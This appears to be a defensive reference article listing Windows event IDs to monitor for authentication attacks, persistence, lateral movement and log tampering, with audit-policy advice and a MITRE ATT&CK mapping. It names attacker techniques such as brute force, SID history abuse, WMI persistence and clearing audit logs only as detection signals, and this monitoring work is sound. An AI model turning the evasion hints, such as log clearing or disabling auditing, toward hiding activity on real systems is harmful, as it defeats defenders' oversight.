Any Windows administrator should prioritize event IDs, as they can be used to identify and resolve issues. This list is organized based on actual incident response experience and Microsoft’s official literature.
Authentication and Logon Events (High Priority)
These incidents should be your top priority for alerting, as they clearly indicate possible attacks or authentication issues.
| Event ID | Category | What It Means |
|---|---|---|
| 4624 | Successful Logon | An account successfully logged on. Check logon type (2=interactive, 3=network, 10=RDP) |
| 4625 | Failed Logon | Failed logon attempt. High volume = brute force attack |
| 4648 | Explicit Credentials | Logon using explicit credentials (runas, net use). Rare in legitimate use – high signal value |
| 4672 | Admin Logon | Special privileges assigned (admin logon). Alert when unexpected accounts appear |
| 4740 | Account Lockout | User account was locked out. Investigate if frequent |
| 4768 | Kerberos TGT Request | Kerberos authentication ticket request. Failures indicate credential issues |
| 4769 | Kerberos Service Ticket | Service ticket requested. Monitor for unusual service access patterns |
| 4649 | Replay Attack | Replay attack detected. Critical security event requiring investigation |
Account and Group Changes Events
| Event ID | Category | What It Means |
|---|---|---|
| 4720 | User Created | New user account created. Often precedes privilege escalation |
| 4724 | Password Reset | Attempt to reset account password |
| 4728 | Global Group Member | Member added to security-enabled global group |
| 4732 | Local Group Member | Member added to local security group. Watch Administrators group! |
| 4765 | SID History Added | SID History added to account – potential privilege escalation attack |
| 4780 | Admin ACL Set | ACL set on admin group member accounts |
Persistence Mechanisms (Critical for Security) Events
Attackers leave these traces when establishing backdoors:
| Event ID | Channel | What It Means |
|---|---|---|
| 7045 | System | New service installed. Common for malware and persistence |
| 4697 | Security | Service installed by Security Subsystem (alternate channel) |
| 4698 | Security | Scheduled task created. Monitor XML payload for actions |
| 4702 | Security | Scheduled task updated. Attackers reuse legitimate task names |
| 5861 | WMI-Activity | Permanent WMI consumer registered – stealthy persistence that survives reboot |
Process Execution (Understanding What Ran) Events
| Event ID | Channel | What It Means |
|---|---|---|
| 4688 | Security | Process created. Requires “Include command line” policy enabled |
| 4104 | PowerShell | PowerShell script block executed. Captures deobfuscated content – invaluable for detecting encoded attacks |
| 1 | Sysmon | Process create with hashes and signatures (requires Sysmon installed) |
Lateral Movement (Detecting Spread) Events
| Event ID | Channel | What It Means |
|---|---|---|
| 4624 (Type 3) | Security | Network logon. Burst across hosts = lateral movement indicator |
| 4624 (Type 10) | Security | RDP logon. Unusual source IPs warrant investigation |
| 5140 | Security | Network share accessed |
| 3 | Sysmon | Network connection from process – pairs with 4624 type 3 for attribution |
Defense Evasion (Critical Alerts)
| Event ID | Category | What It Means |
|---|---|---|
| 1102 | Security | Audit log cleared. NO legitimate reason – ALERT IMMEDIATELY |
| 104 | System | Event log cleared (non-Security logs) |
| 4719 | Security | System audit policy changed. Attackers disable auditing before malicious actions |
| 4907 | Security | Auditing settings on object changed |
| 4616 | Security | System time changed. Can be used to hide activity or break Kerberos |
Object Access and Privilege Use
| Event ID | Category | What It Means |
|---|---|---|
| 4660 | Object Access | Object deleted |
| 4673 | Privilege Use | Privileged service called. Noisy; filter for specific privileges |
| 4674 | Privilege Use | Operation attempted on privileged object |
Additional High-Severity Events
From Microsoft’s official monitoring guidance:
| Event ID | What It Means |
|---|---|
| 4618 | Monitored security event pattern detected |
| 4794 | Directory Services Restore Mode attempted |
| 4964 | Special groups assigned to new logon |
| 4897 | Role separation enabled |
Important Note on Logging Configuration
Windows, by default, fails to log some crucial security events.
Microsoft advises activating the feature of Advanced Audit Policy Configuration through
Computer Configuration > Security Settings > Advanced Audit Policy Configuration.
Another critical thing is to activate Process Creation Auditing for command-line parameters in Event ID 4688 and PowerShell Script Block Logging (Event ID 4104).
They enable you to spot potentially suspicious commands and PowerShell scripts that are frequently employed by attackers.
To obtain enhanced system monitoring and insight into activities within your system, consider deploying Sysmon software developed by Microsoft.
MITRE ATT&CK Mapping Quick Reference
| Technique | Primary Event IDs |
|---|---|
| Command Execution (T1059) | 4688, 4104 |
| Service Persistence (T1543.003) | 7045, 4697 |
| Scheduled Task (T1053.005) | 4698, 4702 |
| Account Creation (T1136) | 4720, 4732, 4728 |
| Remote Services (T1021) | 4624 (Type 3), 5140 |
| Log Clearing (T1070.001) | 1102, 104, 4719 |
Focus your monitoring on this core set first.
After that expand based on your environment’s specific risks and compliance requirements.